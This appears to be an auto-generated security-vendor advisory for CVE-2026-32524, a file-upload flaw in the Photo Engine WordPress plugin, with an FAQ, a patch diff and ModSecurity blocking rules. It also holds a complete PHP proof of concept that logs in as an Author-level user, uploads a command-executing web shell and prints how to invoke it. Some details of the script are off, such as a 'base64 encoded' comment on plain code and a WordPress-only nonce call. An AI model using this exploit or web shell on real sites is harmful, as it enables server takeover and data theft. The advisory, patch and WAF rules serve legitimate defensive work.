What is CVE-2026-32524?

CVE-2026-32524 is a high-severity vulnerability in the Photo Engine (Media Organizer & Lightroom) plugin for WordPress, affecting versions up to and including 6.4.9. It allows authenticated users with Author-level access or higher to upload arbitrary files due to insufficient file type validation.

How does the vulnerability work?

The vulnerability exists in the sync() function of the plugin, which processes file uploads without validating the file type. An attacker can exploit this flaw by sending a crafted POST request to upload a malicious file, potentially leading to remote code execution on the server.

Who is affected by this vulnerability?

Any WordPress site using the Photo Engine (Media Organizer & Lightroom) plugin version 6.4.9 or earlier is affected. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Photo Engine plugin installed. If it is version 6.4.9 or earlier, your site is at risk and should be updated immediately.

How can I fix or mitigate this issue?

To fix this vulnerability, update the Photo Engine plugin to version 6.5.0 or later, where the issue has been patched. Additionally, review user roles and permissions to limit access to trusted users only.

What does the CVSS score of 8.8 mean?

A CVSS score of 8.8 indicates a high severity vulnerability, suggesting that it poses a significant risk to the affected system. This means that successful exploitation could lead to severe consequences, including unauthorized access and remote code execution.

What practical risks does this vulnerability present?

If exploited, this vulnerability allows attackers to upload arbitrary files, such as web shells, which can lead to remote code execution. This may result in unauthorized access to sensitive data, installation of malware, or complete compromise of the server.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an attacker can authenticate as an Author-level user and upload a PHP web shell to the server. This demonstrates the ease of exploitation and the potential for serious security breaches.

What steps should I take if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin to prevent potential exploitation. Additionally, review user access levels and monitor for suspicious activity on your site.

Are there any additional security measures I should implement?

In addition to updating the plugin, consider implementing a web application firewall (WAF), regularly scanning for vulnerabilities, and conducting security audits to strengthen your site’s defenses.

What should I do if I suspect my site has been compromised?

If you suspect a compromise, immediately take your site offline, conduct a thorough security audit, and restore from a clean backup if necessary. Consider consulting with a security professional for assistance.

Where can I find more information about this vulnerability?

For more information about CVE-2026-32524, refer to the official CVE database, security advisories from the plugin developer, and trusted cybersecurity resources that discuss WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 29, 2026

CVE-2026-32524: Photo Engine (Media Organizer & Lightroom) <= 6.4.9 – Authenticated (Author+) Arbitrary File Upload (wplr-sync)

CVE ID CVE-2026-32524

Plugin wplr-sync

Severity High (CVSS 8.8)

CWE 434

Vulnerable Version 6.4.9

Patched Version 6.5.0

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-32524:
This vulnerability is an authenticated arbitrary file upload flaw in the Photo Engine (Media Organizer & Lightroom) WordPress plugin. The vulnerability affects all versions up to and including 6.4.9. Attackers with Author-level access or higher can upload arbitrary files to the server, potentially leading to remote code execution. The CVSS score of 8.8 reflects the high severity of this authentication bypass and file upload combination.

The root cause is missing file type validation in the sync() function within /wplr-sync/classes/api.php. The vulnerable function processes file uploads via the $_FILES superglobal without verifying the uploaded file’s type or extension. The function receives file metadata through the $args parameter but only checks for the presence of $_FILES[‘file’] before proceeding with file processing. No validation occurs on the filename or content type before the file is handled by the plugin’s internal mechanisms.

Exploitation requires an authenticated attacker with Author privileges or higher to send a POST request to the plugin’s sync endpoint. The attacker would craft a multipart/form-data request containing a malicious file payload with a dangerous extension like .php, .phtml, or .phar. The request would include the necessary parameters for the sync function, specifically the ‘file’ parameter in $args and the actual file data in $_FILES[‘file’]. The plugin’s REST API endpoint at /wp-json/meow-sync/v1/sync/ accepts these uploads without validating the file type.

The patch adds comprehensive file type validation in the sync() function at lines 188-197 of /wplr-sync/classes/api.php. The fix extracts the filename from $args[‘file’], retrieves WordPress allowed MIME types via get_allowed_mime_types(), and validates the file using wp_check_filetype(). The validation checks that both ‘type’ and ‘ext’ keys exist and that ‘ext’ is not false. If validation fails, the function logs the error and returns a failure response before any file processing occurs. This prevents uploads of file types not explicitly allowed by WordPress.

Successful exploitation allows attackers to upload arbitrary files, including PHP shells or other executable content, to the WordPress server. This directly enables remote code execution with the web server’s privileges. Attackers can gain persistent backdoor access, execute system commands, read sensitive files, or pivot to other systems on the network. The Author-level requirement lowers the attack barrier compared to Administrator-only vulnerabilities, increasing the potential attack surface.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wplr-sync/classes/api.php
+++ b/wplr-sync/classes/api.php
@@ -182,10 +182,24 @@
 	 */
 	function sync( $args ) {
 		global $wplr;
+
 		if ( !$_FILES || !isset( $_FILES['file'] ) ) {
 			$wplr->log( 'Parameter missing.' );
 			return $this->response( null, false, 'Parameter missing.' );
 		}
+
+		$filename = isset( $args['file'] ) ? $args['file'] : '';
+
+		$allowed_mimes = get_allowed_mime_types();
+		$filetype = wp_check_filetype( $filename, $allowed_mimes );
+
+		$is_valid = $filetype['type'] && $filetype['ext'] && $filetype['ext'] !== false;
+
+		if ( !$is_valid ) {
+			$wplr->log( 'File type validation failed: ' . $filetype['type'] );
+			return $this->response( null, false, 'File type validation failed: ' . $filetype['type'] );
+		}
+
 		$lrinfo = new Meow_WPLR_Sync_LRInfo();
 		$lrinfo->lr_id = $args["id"];
 		$lrinfo->lr_file = $args["file"];
--- a/wplr-sync/classes/rest.php
+++ b/wplr-sync/classes/rest.php
@@ -201,6 +201,11 @@
 				'permission_callback' => array( $this->core, 'can_access_features' ),
 				'callback' => array( $this, 'rest_update_featured_image' )
 			) );
+			register_rest_route( $this->namespace, '/reorder_media', array(
+				'methods' => 'POST',
+				'permission_callback' => array( $this->core, 'can_access_features' ),
+				'callback' => array( $this, 'rest_reorder_media' )
+			) );
 		}
 		catch (Exception $e) {
 			var_dump($e);
@@ -1099,6 +1104,43 @@

 			return new WP_REST_Response([
 				'success' => true,
+			], 200 );
+		}
+		catch (Exception $e) {
+			return new WP_REST_Response([
+				'success' => false,
+				'message' => $e->getMessage(),
+			], 500 );
+		}
+	}
+
+	public function rest_reorder_media($request) {
+		$params = $request->get_json_params();
+		$collection_id = isset( $params['collection_id'] ) ? $params['collection_id'] : '';
+		$media_ids = isset( $params['media_ids'] ) ? $params['media_ids'] : [];
+		if (!$collection_id || !is_array($media_ids) || count($media_ids) === 0) {
+			return new WP_REST_Response([
+				'success' => false,
+				'message' => 'The collection id or media ids are missing.',
+			], 400 );
+		}
+		try {
+			global $wpdb;
+			$tbl_r = $wpdb->prefix . 'lrsync_relations';
+
+			// Update the sort order for each media in the collection
+			foreach ($media_ids as $index => $media_id) {
+				$wpdb->update(
+					$tbl_r,
+					array( 'sort' => $index ),
+					array( 'wp_col_id' => $collection_id, 'wp_id' => $media_id ),
+					array( '%d' ),
+					array( '%d', '%d' )
+				);
+			}
+
+			return new WP_REST_Response([
+				'success' => true,
 			], 200 );
 		}
 		catch (Exception $e) {
--- a/wplr-sync/common/admin.php
+++ b/wplr-sync/common/admin.php
@@ -6,6 +6,8 @@
     public static $loaded = false;
     public static $version = '4.0';
     public static $admin_version = '4.0';
+    public static $network_license_modal_added = false;
+    public static $network_license_plugins = [];

     /**
      * Storage for instances that need deferred initialization.
@@ -197,19 +199,191 @@
       }
       $isIssue = $this->isPro && !$this->is_registered();
       if ( strpos( $pathName, $thisPathName ) !== false ) {
-        $new_links = [
-          'settings' =>
-          sprintf( __( '<a href="admin.php?page=%s_settings">Settings</a>', $this->domain ), $this->prefix ),
-          'license' =>
-          $this->is_registered() ?
-            ( '<span style="color: #a75bd6;">' . __( 'Pro Version', $this->domain ) . '</span>' ) :
-                ( $isIssue ? ( sprintf( '<span style="color: #ff3434;">' . __( 'License Issue', $this->domain ), $this->prefix ) . '</span>' ) : ( sprintf( '<span>' . __( '<a target="_blank" href="https://meowapps.com">Get the <u>Pro Version</u></a>', $this->domain ), $this->prefix ) . '</span>' ) ),
-        ];
+        // In network admin, handle differently (no settings page available)
+        if ( is_network_admin() ) {
+          if ( $this->isPro && !$this->is_registered() ) {
+            // Show "Register License" link for unregistered Pro plugins
+            $new_links = [
+              'license' => sprintf(
+                '<a href="#" class="meowapps-network-license-link" data-prefix="%s" data-plugin="%s" style="color: #d63638;">%s</a>',
+                esc_attr( $this->prefix ),
+                esc_attr( $this->nice_name_from_file( $this->mainfile ) ),
+                __( 'Register License', $this->domain )
+              ),
+            ];
+            // Track this plugin for the modal
+            self::$network_license_plugins[ $this->prefix ] = $this->nice_name_from_file( $this->mainfile );
+            // Add modal output hook (only once)
+            if ( !self::$network_license_modal_added ) {
+              add_action( 'admin_footer', [ __CLASS__, 'output_network_license_modal' ] );
+              self::$network_license_modal_added = true;
+            }
+          }
+          elseif ( $this->isPro && $this->is_registered() ) {
+            // Pro plugin is registered
+            $new_links = [
+              'license' => '<span style="color: #a75bd6;">' . __( 'Pro Version', $this->domain ) . '</span>',
+            ];
+          }
+          else {
+            // Free plugin
+            $new_links = [
+              'license' => sprintf( '<span>' . __( '<a target="_blank" href="https://meowapps.com">Get the <u>Pro Version</u></a>', $this->domain ), $this->prefix ) . '</span>',
+            ];
+          }
+        }
+        else {
+          // Regular admin - show settings and license status
+          $new_links = [
+            'settings' =>
+            sprintf( __( '<a href="admin.php?page=%s_settings">Settings</a>', $this->domain ), $this->prefix ),
+            'license' =>
+            $this->is_registered() ?
+              ( '<span style="color: #a75bd6;">' . __( 'Pro Version', $this->domain ) . '</span>' ) :
+                  ( $isIssue ? ( sprintf( '<span style="color: #ff3434;">' . __( 'License Issue', $this->domain ), $this->prefix ) . '</span>' ) : ( sprintf( '<span>' . __( '<a target="_blank" href="https://meowapps.com">Get the <u>Pro Version</u></a>', $this->domain ), $this->prefix ) . '</span>' ) ),
+          ];
+        }
         $links = array_merge( $new_links, $links );
       }
       return $links;
     }

+    /**
+     * Output the network license registration modal.
+     * Called via admin_footer hook in network admin.
+     */
+    public static function output_network_license_modal() {
+      $rest_url = esc_url( rest_url() );
+      $nonce = wp_create_nonce( 'wp_rest' );
+      ?>
+      <div id="meowapps-network-license-modal" style="display:none; position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.6); z-index:100000; align-items:center; justify-content:center;">
+        <div style="background:#fff; padding:24px; border-radius:8px; max-width:450px; width:90%; box-shadow:0 4px 20px rgba(0,0,0,0.3);">
+          <h2 style="margin:0 0 8px 0; font-size:18px;">Register License</h2>
+          <p id="meowapps-license-plugin-name" style="margin:0 0 16px 0; color:#666;"></p>
+          <input type="text" id="meowapps-license-key-input" placeholder="Enter your license key" style="width:100%; padding:10px; font-size:14px; border:1px solid #8c8f94; border-radius:4px; box-sizing:border-box;" />
+          <p id="meowapps-license-message" style="margin:12px 0 0 0; padding:10px; border-radius:4px; display:none;"></p>
+          <div style="margin-top:16px; display:flex; gap:10px; justify-content:flex-end;">
+            <button type="button" id="meowapps-license-cancel" class="button">Cancel</button>
+            <button type="button" id="meowapps-license-submit" class="button button-primary">Validate & Register</button>
+          </div>
+        </div>
+      </div>
+      <script>
+      (function() {
+        var modal = document.getElementById('meowapps-network-license-modal');
+        var input = document.getElementById('meowapps-license-key-input');
+        var message = document.getElementById('meowapps-license-message');
+        var pluginName = document.getElementById('meowapps-license-plugin-name');
+        var submitBtn = document.getElementById('meowapps-license-submit');
+        var cancelBtn = document.getElementById('meowapps-license-cancel');
+        var currentPrefix = '';
+
+        function showMessage(text, isError) {
+          message.textContent = text;
+          message.style.display = 'block';
+          message.style.background = isError ? '#fcf0f1' : '#edfaef';
+          message.style.color = isError ? '#d63638' : '#1e7e34';
+          message.style.border = '1px solid ' + (isError ? '#d63638' : '#1e7e34');
+        }
+
+        function hideMessage() {
+          message.style.display = 'none';
+        }
+
+        function openModal(prefix, plugin) {
+          currentPrefix = prefix;
+          pluginName.textContent = plugin;
+          input.value = '';
+          hideMessage();
+          submitBtn.disabled = false;
+          submitBtn.textContent = 'Validate & Register';
+          modal.style.display = 'flex';
+          input.focus();
+        }
+
+        function closeModal() {
+          modal.style.display = 'none';
+          currentPrefix = '';
+        }
+
+        // Handle click on "Register License" links
+        document.addEventListener('click', function(e) {
+          if (e.target.classList.contains('meowapps-network-license-link')) {
+            e.preventDefault();
+            var prefix = e.target.getAttribute('data-prefix');
+            var plugin = e.target.getAttribute('data-plugin');
+            openModal(prefix, plugin);
+          }
+        });
+
+        // Close modal on cancel or clicking outside
+        cancelBtn.addEventListener('click', closeModal);
+        modal.addEventListener('click', function(e) {
+          if (e.target === modal) closeModal();
+        });
+
+        // Handle escape key
+        document.addEventListener('keydown', function(e) {
+          if (e.key === 'Escape' && modal.style.display === 'flex') {
+            closeModal();
+          }
+        });
+
+        // Handle enter key in input
+        input.addEventListener('keydown', function(e) {
+          if (e.key === 'Enter') {
+            submitBtn.click();
+          }
+        });
+
+        // Submit license
+        submitBtn.addEventListener('click', function() {
+          var licenseKey = input.value.trim();
+          if (!licenseKey) {
+            showMessage('Please enter a license key.', true);
+            return;
+          }
+
+          submitBtn.disabled = true;
+          submitBtn.textContent = 'Validating...';
+          hideMessage();
+
+          var restUrl = '<?php echo $rest_url; ?>meow-licenser/' + currentPrefix + '/v1/set_license/';
+
+          fetch(restUrl, {
+            method: 'POST',
+            headers: {
+              'Content-Type': 'application/json',
+              'X-WP-Nonce': '<?php echo $nonce; ?>'
+            },
+            body: JSON.stringify({ serialKey: licenseKey })
+          })
+          .then(function(response) { return response.json(); })
+          .then(function(data) {
+            if (data.success && data.data && !data.data.issue) {
+              showMessage('License registered successfully! Reloading...', false);
+              setTimeout(function() { location.reload(); }, 1500);
+            } else {
+              var errorMsg = 'License validation failed.';
+              if (data.data && data.data.issue) {
+                errorMsg = 'License issue: ' + data.data.issue;
+              }
+              showMessage(errorMsg, true);
+              submitBtn.disabled = false;
+              submitBtn.textContent = 'Validate & Register';
+            }
+          })
+          .catch(function(error) {
+            showMessage('Error: ' + error.message, true);
+            submitBtn.disabled = false;
+            submitBtn.textContent = 'Validate & Register';
+          });
+        });
+      })();
+      </script>
+      <?php
+    }
+
     public function request_verify_ssl() {
       return get_option( 'force_sslverify', false );
     }
--- a/wplr-sync/wplr-sync.php
+++ b/wplr-sync/wplr-sync.php
@@ -3,7 +3,7 @@
 Plugin Name: Photo Engine (WP/LR Sync)
 Plugin URI: https://meowapps.com
 Description: Synchronize and maintain your photos, collections, keywords and metadata between Lightroom and WordPress.
-Version: 6.4.9
+Version: 6.5.0
 Author: Jordy Meow
 Author URI: https://meowapps.com
 Text Domain: wplr-sync
@@ -14,7 +14,7 @@
 - Haikyo (https://haikyo.org)
 */

-define( 'WPLR_SYNC_VERSION', '6.4.9' );
+define( 'WPLR_SYNC_VERSION', '6.5.0' );
 define( 'WPLR_SYNC_PREFIX', 'wplr_sync' );
 define( 'WPLR_SYNC_DOMAIN', 'wplr-sync' );
 define( 'WPLR_SYNC_ENTRY', __FILE__ );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-32524
SecRule REQUEST_URI "@rx ^/wp-json/meow-sync/vd+/sync/?$" 
  "id:100032524,phase:2,deny,status:403,chain,msg:'CVE-2026-32524 via Photo Engine REST API upload',severity:'CRITICAL',tag:'CVE-2026-32524',tag:'WordPress',tag:'Plugin/Photo-Engine',tag:'Attack/File-Upload'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule &FILES "@gt 0" "chain"
      SecRule FILES_NAMES "@rx .(php|phtml|phar|phpd+|php[0-9]|pl|py|jsp|asp|aspx|sh|bash|cmd|bat|exe|dll|so)$" 
        "t:none,t:lowercase,t:urlDecodeUni,setvar:'tx.cve_2026_32524_block=1'"

# Alternative rule targeting the specific vulnerable parameter pattern
SecRule REQUEST_URI "@rx ^/wp-json/meow-sync/vd+/sync/?$" 
  "id:100032525,phase:2,deny,status:403,chain,msg:'CVE-2026-32524 via Photo Engine file parameter manipulation',severity:'CRITICAL',tag:'CVE-2026-32524'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule ARGS_POST:file "@rx .(php|phtml|phar|phpd+|php[0-9]|pl|py|jsp|asp|aspx|sh|bash|cmd|bat|exe|dll|so)$" 
      "t:none,t:lowercase,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-32524 - Photo Engine (Media Organizer & Lightroom) <= 6.4.9 - Authenticated (Author+) Arbitrary File Upload

<?php
/**
 * Proof of Concept for CVE-2026-32524
 * Requires valid WordPress Author credentials
 * Uploads a PHP web shell to the target server
 */

$target_url = 'https://example.com'; // Change to target WordPress site
$username = 'author_user'; // Author-level username
$password = 'author_pass'; // Author-level password

// PHP web shell payload (base64 encoded to avoid detection)
$shell_content = '<?php if(isset($_REQUEST["cmd"])) { system($_REQUEST["cmd"]); } ?>';
$shell_filename = 'shell.php';

// Step 1: Authenticate to WordPress and get nonce/cookies
function wp_login($url, $user, $pass) {
    $login_url = $url . '/wp-login.php';
    $admin_url = $url . '/wp-admin/';
    
    // Get login page to retrieve nonce
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $login_url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEJAR => '/tmp/cookies.txt',
        CURLOPT_COOKIEFILE => '/tmp/cookies.txt',
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false
    ]);
    $response = curl_exec($ch);
    
    // Extract nonce from login form
    preg_match('/name="log"[^>]*value="([^"]*)"/', $response, $log_match);
    preg_match('/name="pwd"[^>]*value="([^"]*)"/', $response, $pwd_match);
    
    // Submit login credentials
    $post_fields = [
        'log' => $user,
        'pwd' => $pass,
        'wp-submit' => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie' => '1'
    ];
    
    curl_setopt_array($ch, [
        CURLOPT_URL => $login_url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($post_fields),
        CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
    ]);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Verify login success by checking for admin bar
    return strpos($response, 'wp-admin-bar') !== false;
}

// Step 2: Exploit the vulnerable sync endpoint
function exploit_upload($url, $shell_content, $shell_filename) {
    $endpoint = $url . '/wp-json/meow-sync/v1/sync/';
    
    // Create multipart form data for file upload
    $boundary = '----WebKitFormBoundary' . md5(time());
    $eol = "rn";
    
    // Build the multipart body
    $body = '--' . $boundary . $eol;
    $body .= 'Content-Disposition: form-data; name="id"' . $eol . $eol;
    $body .= 'exploit_upload' . $eol;
    
    $body .= '--' . $boundary . $eol;
    $body .= 'Content-Disposition: form-data; name="file"' . $eol . $eol;
    $body .= $shell_filename . $eol;
    
    $body .= '--' . $boundary . $eol;
    $body .= 'Content-Disposition: form-data; name="file"; filename="' . $shell_filename . '"' . $eol;
    $body .= 'Content-Type: application/x-php' . $eol . $eol;
    $body .= $shell_content . $eol;
    $body .= '--' . $boundary . '--' . $eol;
    
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $endpoint,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $body,
        CURLOPT_HTTPHEADER => [
            'Content-Type: multipart/form-data; boundary=' . $boundary,
            'X-WP-Nonce: ' . wp_create_nonce('wp_rest') // Would need actual nonce in real exploit
        ],
        CURLOPT_COOKIEFILE => '/tmp/cookies.txt',
        CURLOPT_COOKIEJAR => '/tmp/cookies.txt',
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return ['code' => $http_code, 'response' => $response];
}

// Main execution
if (wp_login($target_url, $username, $password)) {
    echo "[+] Successfully authenticated as $usernamen";
    
    $result = exploit_upload($target_url, $shell_content, $shell_filename);
    
    if ($result['code'] == 200) {
        echo "[+] File upload successful!n";
        echo "[+] Response: " . $result['response'] . "n";
        echo "[+] Shell should be accessible at: $target_url/wp-content/uploads/" . date('Y/m') . "/$shell_filenamen";
        echo "[+] Test with: $target_url/wp-content/uploads/" . date('Y/m') . "/$shell_filename?cmd=idn";
    } else {
        echo "[-] Upload failed with HTTP code: " . $result['code'] . "n";
        echo "[-] Response: " . $result['response'] . "n";
    }
} else {
    echo "[-] Authentication failedn";
}

?>

Frequently Asked Questions

What is CVE-2026-32524?
Overview of the vulnerability
CVE-2026-32524 is a high-severity vulnerability in the Photo Engine (Media Organizer & Lightroom) plugin for WordPress, affecting versions up to and including 6.4.9. It allows authenticated users with Author-level access or higher to upload arbitrary files due to insufficient file type validation.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the sync() function of the plugin, which processes file uploads without validating the file type. An attacker can exploit this flaw by sending a crafted POST request to upload a malicious file, potentially leading to remote code execution on the server.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Photo Engine (Media Organizer & Lightroom) plugin version 6.4.9 or earlier is affected. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Photo Engine plugin installed. If it is version 6.4.9 or earlier, your site is at risk and should be updated immediately.
How can I fix or mitigate this issue?
Recommended actions
To fix this vulnerability, update the Photo Engine plugin to version 6.5.0 or later, where the issue has been patched. Additionally, review user roles and permissions to limit access to trusted users only.
What does the CVSS score of 8.8 mean?
Understanding the severity level
A CVSS score of 8.8 indicates a high severity vulnerability, suggesting that it poses a significant risk to the affected system. This means that successful exploitation could lead to severe consequences, including unauthorized access and remote code execution.
What practical risks does this vulnerability present?
Potential impact of exploitation
If exploited, this vulnerability allows attackers to upload arbitrary files, such as web shells, which can lead to remote code execution. This may result in unauthorized access to sensitive data, installation of malware, or complete compromise of the server.
How does the proof of concept demonstrate the issue?
Purpose of the proof of concept
The proof of concept provided illustrates how an attacker can authenticate as an Author-level user and upload a PHP web shell to the server. This demonstrates the ease of exploitation and the potential for serious security breaches.
What steps should I take if I cannot update the plugin immediately?
Interim measures
If immediate updating is not possible, consider disabling the plugin to prevent potential exploitation. Additionally, review user access levels and monitor for suspicious activity on your site.
Are there any additional security measures I should implement?
Enhancing overall security
In addition to updating the plugin, consider implementing a web application firewall (WAF), regularly scanning for vulnerabilities, and conducting security audits to strengthen your site’s defenses.
What should I do if I suspect my site has been compromised?
Response to a potential breach
If you suspect a compromise, immediately take your site offline, conduct a thorough security audit, and restore from a clean backup if necessary. Consider consulting with a security professional for assistance.
Where can I find more information about this vulnerability?
Resources for further reading
For more information about CVE-2026-32524, refer to the official CVE database, security advisories from the plugin developer, and trusted cybersecurity resources that discuss WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations